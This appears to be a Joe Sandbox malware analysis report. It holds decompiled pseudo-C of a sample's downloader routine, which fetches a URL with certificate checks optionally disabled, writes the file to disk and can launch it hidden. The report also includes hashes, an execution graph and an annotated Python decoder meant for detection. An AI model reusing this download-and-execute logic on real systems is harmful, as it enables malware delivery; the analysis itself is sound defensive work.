                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%
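The E03A79BB4 listing that follows branches on an option word (_a12) more than a dozen times, and the two WinINet flag words it chooses between are the point not to miss: 0x84803200 is 0x84000200 plus INTERNET_FLAG_SECURE and both INTERNET_FLAG_IGNORE_CERT_* bits, so the 0x10000 option means HTTPS with certificate name and date validation turned off. The Python below is an added example, not code from the sample or from the report: it transcribes those branches into a decoder that turns a task's option word into the behaviour the routine derives from it. The constant names are the standard Windows values of the literals in the listing; naming the unresolved import slots (InternetOpen, Sleep, CreateProcess, DuplicateHandle) is an assumption from argument shape, as is reading the decompiler's " !" as a bitwise NOT.

```python
"""Decode the option word (_a12) of E03A79BB4 into the settings the routine
derives from it.

Added example; not code from the sample or from the Joe Sandbox report. Each
rule is transcribed from a branch of the decompiled listing; the WinINet and
CreateProcess constant names are the standard Windows values of the literals
in that listing. The identity of the import slots (InternetOpen, Sleep,
CreateProcess, DuplicateHandle) is an assumption from argument shape.
"""

INTERNET_FLAG_NAMES = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
}
CERT_CHECKS_OFF = 0x00003000  # both IGNORE_CERT_* bits
CREATION_FLAG_NAMES = {0x20: "NORMAL_PRIORITY_CLASS", 0x08: "DETACHED_PROCESS"}

# literals taken from the listing
FLAGS_PLAIN = 0x84000200          # _v28 default
FLAGS_TLS_NO_VERIFY = 0x84803200  # _v28 when option 0x10000 is set
DELAY_BASE, DELAY_SPAN = 0x1388, 0x3a98  # *0x3a9f90c(x % 0x3a98 + 0x1388)
WAIT_LOOP = 16 * 0x3e8            # do { *0x3a9f90c(0x3e8) } while (--count)


def decode_bits(word, names):
    """Split a flag word into its named bits and return any unnamed remainder."""
    found = [name for bit, name in sorted(names.items()) if word & bit]
    remainder = word & ~sum(names)
    return found, remainder


def decode_task_options(opts, global_tls_off=False):
    """Mirror the option handling of E03A79BB4 for one task word.

    global_tls_off models bit 0 of *0x3aa0620, which the routine uses to
    strip option 0x10000 before anything else.
    """
    opts &= 0xFFFFFFFF
    if global_tls_off and opts & 0x10000:
        opts &= 0xFFFEFFFF
    wininet = FLAGS_TLS_NO_VERIFY if opts & 0x10000 else FLAGS_PLAIN
    names, remainder = decode_bits(wininet, INTERNET_FLAG_NAMES)
    s = {
        "wininet_flags": wininet,
        "wininet_flag_names": names,
        "wininet_unnamed_bits": remainder,
        "tls_cert_checks_disabled": bool(wininet & CERT_CHECKS_OFF),
        # option 0x4: random pre-request delay of 0x1388 + (x mod 0x3a98)
        "pre_delay_range": (DELAY_BASE, DELAY_BASE + DELAY_SPAN - 1) if opts & 0x4 else None,
        # options 0x1000 and 0x80 together: target path copied from config + 0x1646
        "path_from_config": bool(opts & 0x1000 and opts & 0x80),
        # option 0x8000 (_v64): bypass the WinINet session and use the _a8 source
        "skip_wininet": bool(opts & 0x8000),
        # option 0x2: also allocate Content-Length + 2 bytes and keep the body
        "buffer_in_memory": bool(opts & 0x2),
        # option 0x8: launch the file once it has been written
        "execute_after_download": bool(opts & 0x8),
    }
    if s["execute_after_download"]:
        # wShowWindow = !(opts >> 5) & 1; with " !" read as bitwise NOT, bit 5 means SW_HIDE
        s["window_hidden"] = bool(opts & 0x20)
        # the CreateProcess-shaped call runs only with 0x200, 0x2000 and 0x4000 all clear
        s["launch_via_create_process"] = not opts & (0x200 | 0x2000 | 0x4000)
        s["creation_flags"] = decode_bits(0x28, CREATION_FLAG_NAMES)[0]
        # option 0x400 (with 0x200 clear): sets config bit 0x40 and, on that first
        # successful launch, waits 16 x 0x3e8 before continuing
        s["first_launch_wait"] = WAIT_LOOP if opts & 0x400 and not opts & 0x200 else 0
    return s


if __name__ == "__main__":
    for word in (0x0, 0x4, 0x10008, 0x10428):
        print(hex(word), decode_task_options(word))
```

The decoder is meant for reading task words recovered from the sample's configuration or its C&C traffic: a word of 0x10008, for instance, decodes to an HTTPS fetch with certificate checks off followed by a launch of the downloaded file, which is the combination a detection rule on this routine should key on.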

                        C-Code - Quality: 17%
                        			E03A79BB4(char _a4, intOrPtr _a8, signed int _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28) {
                        				signed int _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				char _v40;
                        				signed int _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				char _v56;
                        				char _v60;
                        				signed int _v64;
                        				intOrPtr _v72;
                        				char _v80;
                        				short _v104;
                        				intOrPtr _v108;
                        				char _v152;
                        				char _v672;
                        				char _v928;
                        				char _v1448;
                        				char _v1968;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t237;
                        				signed int _t247;
                        				intOrPtr _t249;
                        				intOrPtr _t253;
                        				intOrPtr _t257;
                        				intOrPtr* _t259;
                        				intOrPtr* _t262;
                        				char _t280;
                        				signed int _t282;
                        				intOrPtr* _t287;
                        				signed int _t296;
                        				signed int _t309;
                        				intOrPtr* _t314;
                        				intOrPtr _t323;
                        				signed int _t328;
                        				intOrPtr* _t330;
                        				intOrPtr* _t334;
                        				intOrPtr* _t357;
                        				intOrPtr _t363;
                        				intOrPtr _t370;
                        				intOrPtr _t375;
                        				intOrPtr* _t378;
                        				intOrPtr* _t380;
                        				signed int _t383;
                        				signed int _t389;
                        				void* _t400;
                        				signed int _t401;
                        				intOrPtr _t402;
                        				void* _t403;
                        				intOrPtr* _t412;
                        				signed int _t420;
                        				void* _t421;
                        				intOrPtr _t422;
                        				signed int _t426;
                        				intOrPtr _t428;
                        
                        				_t405 = _a4;
                        				_t412 = _a20;
                        				if(_a4 == 0 || E03A619D6(_t405) < 5) {
                        					if(_t412 != 0) {
                        						 *_t412 = 0xa; // status 10 reported through the optional out-parameter _a20: URL missing or shorter than 5 chars
                        					}
                        					goto L150;
                        				} else {
                        					_v16 = 0;
                        					_v12 = 0;
                        					_v24 = 0;
                        					_v28 = 0x84000200; // INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI (standard WinINet values of the literal; the slot that receives _v28 is not named by the sandbox)
                        					_v44 = 0;
                        					_v40 = 0;
                        					_v56 = 0;
                        					_v32 = 0;
                        					_v20 = E03A6161B(0x802);
                        					_v60 = 0x100;
                        					_v36 = 0;
                        					E03A614DB(_t405,  &_v1448, 0, 0x208);
                        					E03A614DB(_t405,  &_v928, 0, 0x100);
                        					E03A614DB(_t405,  &_v672, 0, 0x208);
                        					if(( *0x3aa0620 & 0x00000001) != 0 && (_a12 & 0x00010000) != 0) {
                        						_a12 = _a12 & 0xfffeffff; // a global config bit strips option 0x10000, the option that selects the TLS request flags further down
                        					}
                        					_t247 = _a12 & 0x00001000;
                        					_v52 = _t247;
                        					if(_t247 == 0 || (_a12 & 0x00000080) == 0) {
                        						_t249 = E03A79B0E(_t405,  &_v672);
                        					} else {
                        						_t389 =  *0x3a9f2e8; // 0x16d3fe8
                        						 *0x3a9f6a4( &_v672, _t389 + 0x1646, 0x103); // options 0x1000 and 0x80 both set: copy up to 0x103 chars of a path stored at config block + 0x1646 instead of generating one
                        						 *0x3a9fc84( &_v672);
                        						 *0x3a9fc68( &_v672);
                        						_t405 =  &_v672;
                        						_t249 = E03A619E8( &_v672);
                        					}
                        					_v48 = _t249;
                        					if(_t249 == 0) {
                        						_v48 = E03A79B75( &_v672);
                        					}
                        					if(_v20 != 0) {
                        						if(_a16 != 0 || (_a12 & 0x00000002) == 0) {
                        							if((_a12 & 0x00000004) != 0) {
                        								_t383 = E03A6181B(_t405);
                        								_t405 = 0x3a98;
                        								 *0x3a9f90c(_t383 % 0x3a98 + 0x1388); // option 0x4: delay of 0x1388 + (x mod 0x3a98), i.e. 5000 to 19999 ms if this slot is Sleep (unnamed here; the same slot is called with 0x3e8 in the 16-step wait loop below)
                        							}
                        							if(E03A64199(0x207, _t405,  &_v1448) < 5) {
                        								 *0x3a9f6a0( &_v1448, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", 0x207); // fallback User-Agent (IE 6 on XP) when the configured one is shorter than 5 chars; a fixed string suited to a network signature
                        							}
                        							_t253 =  *0x3aa0618; // 0x1
                        							if(_t253 != 1 && _t253 != 0) { // access type clamped to 0 or 1: INTERNET_OPEN_TYPE_PRECONFIG or INTERNET_OPEN_TYPE_DIRECT
                        								_t253 = 0;
                        							}
                        							if((_a12 & 0x00010000) != 0) {
                        								_v28 = 0x84803200; // option 0x10000: adds INTERNET_FLAG_SECURE plus INTERNET_FLAG_IGNORE_CERT_CN_INVALID and INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, i.e. HTTPS with certificate name and date checks disabled
                        							}
                        							_t407 = _a12 & 0x00008000;
                        							_v64 = _t407;
                        							if(_t407 != 0) {
                        								_t420 = 0;
                        								goto L41;
                        							} else {
                        								_t428 =  *0x3a9fbd4( &_v1448, _t253, 0, 0, 0); // (agent, accessType, proxy, proxyBypass, flags): the argument shape of InternetOpenA; slot unnamed by the sandbox
                        								_v16 = _t428;
                        								if(_t428 != 0) {
                        									_t370 =  *0x3a9fbdc(_t428, _a4, 0, 0, _v28, 0); // (hInternet, url, headers, headersLen, flags, context): InternetOpenUrlA shape, with the flag word chosen above
                        									_v12 = _t370;
                        									if(_t370 != 0) {
                        										_push(0);
                        										_push( &_v60);
                        										_t407 =  &_v928;
                        										_push( &_v928);
                        										_push(5);
                        										_push(_t370);
                        										if( *0x3a9fc08() != 1) { // pushed as (hRequest, 5, &_v928, &_v60, 0): HttpQueryInfoA shape with 5 == HTTP_QUERY_CONTENT_LENGTH; anything but TRUE is treated as failure
                        											L36:
                        											_t420 = 0x800; // no usable Content-Length: fall back to an 0x800-byte (2048) read size
                        											_v44 = 0x800;
                        											L37:
                        											if((_a12 & 0x00000002) != 0 && _t420 != 0) {
                        												_t75 = _t420 + 2; // 0x802
                        												_v36 = E03A6161B(_t75);
                        											}
                        											L41:
                        											if(_v64 != 0) {
                        												_t400 = E03A6171C(_a8);
                        												_t421 = E03A6171C(_a4);
                        												_a4 = 1;
                        												if(_t400 == 0) {
                        													L108:
                        													_t257 = E03A8DC5C( &_v672);
                        													_v32 = _t257;
                        													if(_t257 == 0) {
                        														L102:
                        														if(_v12 != 0) {
                        															 *0x3a9fbb8(_v12); // InternetCloseHandle shape, called for both WinINet handles; slot unnamed by the sandbox
                        														}
                        														if(_v16 != 0) {
                        															 *0x3a9fbb8(_v16);
                        														}
                        														E03A617E4(_v20);
                        														_t259 = _a20;
                        														if(_t259 != 0) {
                        															 *_t259 = 0xc; // status 12 reported through _a20 when E03A8DC5C on the target path returns 0
                        														}
                        														L150:
                        														_t237 = 0;
                        														goto L151;
                        													}
                        													L109:
                        													_t401 = _a12;
                        													if((_t401 & 0x00000008) == 0) {
                        														L139:
                        														_t402 = _a24;
                        														if(_t402 != 0) {
                        															_t422 = _a28;
                        															if(_t422 != 0) {
                        																E03A614DB(_t407, _t402, 0, _t422 + _t422);
                        																 *0x3a9f6a4(_t402,  &_v672, _t422 - 1);
                        															}
                        														}
                        														if((_a12 & 0x00000001) != 0 && (_a12 & 0x00000100) != 0) {
                        															 *0x3a9f7a8(_t402, 0, 4);
                        														}
                        														_t262 = _a20;
                        														if(_t262 != 0) {
                        															 *_t262 = 0;
                        														}
                        														_t237 = _v32;
                        														goto L151;
                        													}
                        													_a4 = 0;
                        													E03A6518D( &_v152,  &_v80); // _v152 and _v80 are initialised together and passed last to the 10-argument call below: STARTUPINFO and PROCESS_INFORMATION by shape
                        													_t407 =  !(_t401 >> 5) & 1;
                        													_v108 = 1; // offset 0x2c of _v152, where STARTUPINFO.dwFlags sits; 1 == STARTF_USESHOWWINDOW
                        													_v104 =  !(_t401 >> 5) & 1; // offset 0x30, wShowWindow: 1 (SW_SHOWNORMAL) unless option bit 0x20 is set, if the decompiler's " !" is a bitwise NOT
                        													if((_t401 & 0x00000200) == 0) {
                        														_t426 = _t401 & 0x00000400;
                        														_a16 = 0;
                        														if(_t426 == 0) {
                        															 *0x3a9f968( *0x3a9ec4a, 0);
                        														} else {
                        															 *0x3a9f968( *0x3a9ec4a, 0x4d2);
                        															_t407 =  *0x3a9f2e8; // 0x16d3fe8
                        															_t195 = _t407 + 0xa; // 0x22
                        															_t296 =  *_t195;
                        															if((_t296 & 0x00000040) == 0) {
                        																_a16 = 1;
                        																 *(_t407 + 0xa) = _t296 | 0x00000040;
                        															}
                        														}
                        														if((_t401 & 0x00002000) == 0) {
                        															if((_t401 & 0x00004000) == 0) {
                        																_push( &_v80);
                        																_push( &_v152);
                        																_push(0);
                        																_push(0);
                        																_push(0x28);
                        																_push(0);
                        																_push(0);
                        																_push(0);
                        																_push(0);
                        																_push( &_v672);
                        																if( *0x3a9f6ec() != 0) {
                        																	L129:
                        																	if(_t426 == 0 || _v72 == 0) {
                        																		L137:
                        																		E03A651CA( &_v80);
                        																		goto L138;
                        																	} else {
                        																		_t280 = E03A63207(_v72);
                        																		_a4 = _t280;
                        																		if(_t280 != 0) {
                        																			_t407 =  &_a4;
                        																			 *0x3a9f82c(0xffffffff, _t280, _v80,  &_a4, 0, 0, 3);
                        																		}
                        																		if(_a16 == 1) {
                        																			_t403 = 0x10;
                        																			do {
                        																				 *0x3a9f90c(0x3e8);
                        																				_t403 = _t403 - 1;
                        																			} while (_t403 != 0);
                        																			_t282 =  *0x3a9f2e8; // 0x16d3fe8
                        																			 *(_t282 + 0xa) =  *(_t282 + 0xa) & 0xffffffbf;
                        																		}
                        																		goto L137;
                        																	}
                        																}
                        																_push(0);
                        																_push(0);
                        																_push(0);
                        																_push( &_v672);
                        																_push(L"open");
                        																_push(0);
                        																if( *0x3a9fc50() <= 0x20) {
                        																	goto L118;
                        																}
                        																goto L129;
                        															}
                        															_push(0);
                        															_push(0);
                        															_push(0);
                        															_push( &_v672);
                        															_push(L"open");
                        															_push(0);
                        															if( *0x3a9fc50() > 0x20) {
                        																goto L138;
                        															}
                        															goto L118;
                        														} else {
                        															if(E03A83197( &_v672) != 0) {
                        																L138:
                        																 *0x3a9f968( *0x3a9ec4a, 0x4d2);
                        																goto L139;
                        															}
                        															L118:
                        															if(_v12 != 0) {
                        																 *0x3a9fbb8(_v12);
                        															}
                        															if(_v16 != 0) {
                        																 *0x3a9fbb8(_v16);
                        															}
                        															E03A617E4(_v20);
                        															_t287 = _a20;
                        															if(_t287 != 0) {
                        																 *_t287 = 8;
                        															}
                        															L96:
                        															if(_v24 == 0) {
                        																goto L150;
                        															}
                        															_push(_v24);
                        															L67:
                        															 *0x3a9f824();
                        															goto L150;
                        														}
                        													}
                        													E03A8816A( &_v672,  &_v152,  &_v80);
                        													goto L139;
                        												}
                        												if(_t421 != 0) {
                        													 *0x3a9fc70( &_v672, _t400);
                        													_a4 =  *0x3a9f540(0, _t421,  &_v672, 0, 0);
                        													E03A617E4(_t421);
                        												}
                        												E03A617E4(_t400);
                        												if(_a4 >= 0) {
                        													goto L108;
                        												} else {
                        													goto L102;
                        												}
                        											}
                        											_t309 = _a12 & 0x00000002;
                        											_v28 = _t309;
                        											if(_t309 != 0) {
                        												L69:
                        												do {
                        													E03A614DB(_t407, _v20, 0, 0x800);
                        													_v40 = 0;
                        													_v56 = 0;
                        													if(_v28 == 0) {
                        														L73:
                        														_push( &_v40);
                        														_push(0x800);
                        														_push(_v20);
                        														_push(_v12);
                        														if( *0x3a9fbe4() != 1) {
                        															L84:
                        															if(_v12 != 0) {
                        																 *0x3a9fbb8(_v12);
                        															}
                        															if(_v16 != 0) {
                        																 *0x3a9fbb8(_v16);
                        															}
                        															E03A617E4(_v20);
                        															_t314 = _a20;
                        															if(_t314 != 0) {
                        																 *_t314 = 7;
                        															}
                        															goto L96;
                        														}
                        														if(_v40 == 0) {
                        															break;
                        														}
                        														if(_v28 == 0 || _v36 == 0) {
                        															_push(0);
                        															_push( &_v56);
                        															_push(_v40);
                        															_push(_v20);
                        															_push(_v24);
                        															if( *0x3a9f788() == 0) {
                        																goto L84;
                        															}
                        														} else {
                        															E03A61493(_t407, _v36 + _v32, _v20, _v40);
                        														}
                        														goto L79;
                        													}
                        													_t121 = _t420 - 0x800; // -2048
                        													if(_v32 < _t121) {
                        														goto L73;
                        													}
                        													_t420 = _t420 + 0x2000;
                        													_t328 = E03A617B4(_v36, _t420);
                        													_v36 = _t328;
                        													if(_t328 == 0) {
                        														if(_v12 != 0) {
                        															 *0x3a9fbb8(_v12);
                        														}
                        														if(_v16 != 0) {
                        															 *0x3a9fbb8(_v16);
                        														}
                        														E03A617E4(_v20);
                        														_t330 = _a20;
                        														if(_t330 != 0) {
                        															 *_t330 = 0xb;
                        														}
                        														goto L96;
                        													}
                        													goto L73;
                        													L79:
                        													_t323 = _v40;
                        													_v32 = _v32 + _t323;
                        												} while (_t323 > 0);
                        												if(_v28 != 0) {
                        													L82:
                        													_t407 = _v36;
                        													 *_a16 = _v36;
                        													L83:
                        													if(_v32 != 0) {
                        														goto L109;
                        													}
                        													goto L84;
                        												}
                        												 *0x3a9f824(_v24);
                        												_v24 = 0;
                        												 *0x3a9fbb8(_v16);
                        												_v16 = 0;
                        												 *0x3a9fbb8(_v12);
                        												_v12 = 0;
                        												if(_v28 == 0) {
                        													goto L83;
                        												}
                        												goto L82;
                        											}
                        											if(_v48 == 0) {
                        												L45:
                        												if(_v12 != 0) {
                        													 *0x3a9fbb8(_v12);
                        												}
                        												if(_v16 != 0) {
                        													 *0x3a9fbb8(_v16);
                        												}
                        												E03A617E4(_v20);
                        												_t334 = _a20;
                        												if(_t334 != 0) {
                        													 *_t334 = 6;
                        												}
                        												goto L150;
                        											}
                        											_a4 = E03A6171C(_a8);
                        											E03A614DB(_t407,  &_v1968, 0, 0x208);
                        											if(_a4 != 0) {
                        												_push( &_v672);
                        												if( *0x3a9fc88() == 0) {
                        													 *0x3a9f758( &_v672, 0);
                        												}
                        												 *0x3a9fc68( &_v672);
                        												 *0x3a9f6a4( &_v1968,  &_v672, 0x103);
                        												 *0x3a9fc70( &_v672, _a4);
                        												if(_v52 != 0) {
                        													E03A8365B(_t420, 0);
                        												}
                        												_v24 =  *0x3a9f784( &_v672, 0x40000000, 0, 0, 2, 0x80, 0);
                        												if(_v52 != 0) {
                        													E03A834CF(0x40000000, 0);
                        												}
                        												if(_v24 != 0xffffffff) {
                        													L68:
                        													E03A617E4(_a4);
                        													_t420 = _v44;
                        													goto L69;
                        												} else {
                        													E03A614DB(_t407,  &_v672, 0, 0x208);
                        													if(E03A79B75( &_v672) == 0) {
                        														L60:
                        														if(_v12 != 0) {
                        															 *0x3a9fbb8(_v12);
                        														}
                        														if(_v16 != 0) {
                        															 *0x3a9fbb8(_v16);
                        														}
                        														E03A617E4(_v20);
                        														_t357 = _a20;
                        														if(_t357 != 0) {
                        															 *_t357 = 6;
                        														}
                        														_push(0xffffffff);
                        														goto L67;
                        													}
                        													 *0x3a9fc70( &_v672, _a4);
                        													_t363 =  *0x3a9f784( &_v672, 0x40000000, 0, 0, 2, 0x80, 0);
                        													_v24 = _t363;
                        													if(_t363 != 0xffffffff) {
                        														goto L68;
                        													}
                        													goto L60;
                        												}
                        											}
                        											goto L45;
                        										}
                        										_t375 =  *0x3a9f648( &_v928);
                        										_t420 = _t375;
                        										_pop(_t407);
                        										_v44 = _t375;
                        										if(_t420 == 0 || _t420 < 0x400) {
                        											goto L36;
                        										} else {
                        											goto L37;
                        										}
                        									}
                        									 *0x3a9fbb8(_t428);
                        									E03A617E4(_v20);
                        									_t378 = _a20;
                        									if(_t378 != 0) {
                        										 *_t378 = 5;
                        									}
                        									goto L150;
                        								}
                        								E03A617E4(_v20);
                        								_t380 = _a20;
                        								if(_t380 != 0) {
                        									 *_t380 = 4;
                        								}
                        								goto L150;
                        							}
                        						} else {
                        							E03A617E4(_v20);
                        							_push(0xa);
                        							goto L13;
                        						}
                        					} else {
                        						_push(0xb);
                        						L13:
                        						_pop(_t237);
                        						L151:
                        						return _t237;
                        					}
                        				}
                        			}

                        (Per-line instruction address column omitted; the listing above maps to 0x03a79bb7 to 0x03a7a3fb.)

                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.572071981.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, Offset: 03A60000, based on PE: true
                        • Associated: 00000005.00000002.572448936.0000000003A87000.00000020.00000001.00040000.00000000.sdmp
                        • Associated: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp
                        • Associated: 00000005.00000002.572951791.0000000003A9F000.00000040.00000001.00040000.00000000.sdmp
                        • Associated: 00000005.00000002.573022167.0000000003AA4000.00000040.00000001.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3a60000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)$open
                        • API String ID: 0-860629979
                        • Opcode ID: c59f07edaefc16b95dda7b94eb852f13e4eb506dccd25badd3612739cae4df2e
                        • Instruction ID: 186d29340fd6b5cbc975b50df629c4eaaba13af3a09627988245c3b8c487a83b
                        • Opcode Fuzzy Hash: c59f07edaefc16b95dda7b94eb852f13e4eb506dccd25badd3612739cae4df2e
                        • Instruction Fuzzy Hash: 22323A75901219AFCF21EFA4DC88AEEBBB9EF05701F18445BF505E6254DB348A92CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:7.1%
                        Dynamic/Decrypted Code Coverage:2.7%
                        Signature Coverage:0%
                        Total number of Nodes:37
                        Total number of Limit Nodes:2
                        execution_graph
                        25456 3354004 URLDownloadToFileW
                        25407 1380f5a LdrInitializeThunk
                        25457 3354876 GetPEB GetPEB
                        25409 335489c
                        25412 33548d5
                        25409->25412
                        25411 33548c6
                        25415 33548ec
                        25412->25415
                        25413 33548f7
                        25413->25411
                        25415->25413
                        25418 33361e9
                        25415->25418
                        25419 33361f8
                        25418->25419
                        25426 3336202
                        25419->25426
                        25421 3336200
                        25421->25413
                        25422 3354963
                        25421->25422
                        25424 335496d
                        25422->25424
                        25437 333e06b
                        25424->25437
                        25425 33549ee
                        25425->25413
                        25427 333622b
                        25426->25427
                        25432 3355150
                        25427->25432
                        25429 333625d
                        25430 3355150 GetPEB
                        25429->25430
                        25431 333626c
                        25430->25431
                        25431->25421
                        25433 335515d
                        25432->25433
                        25434 3355161
                        25432->25434
                        25433->25429
                        25435 33551a9 GetPEB
                        25434->25435
                        25436 33551c3
                        25434->25436
                        25435->25436
                        25436->25429
                        25438 333e099
                        25437->25438
                        25441 333db20
                        25438->25441
                        25440 333e0a9
                        25440->25425
                        25442 333db36
                        25441->25442
                        25445 333e6a4
                        25442->25445
                        25444 333db41
                        25444->25440
                        25446 333e6b8
                        25445->25446
                        25448 333e720
                        25446->25448
                        25449 33351f6
                        25446->25449
                        25448->25444
                        25450 33351fe
                        25449->25450
                        25452 333522e
                        25449->25452
                        25451 3335215 GetPEB
                        25450->25451
                        25450->25452
                        25451->25452
                        25452->25448
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
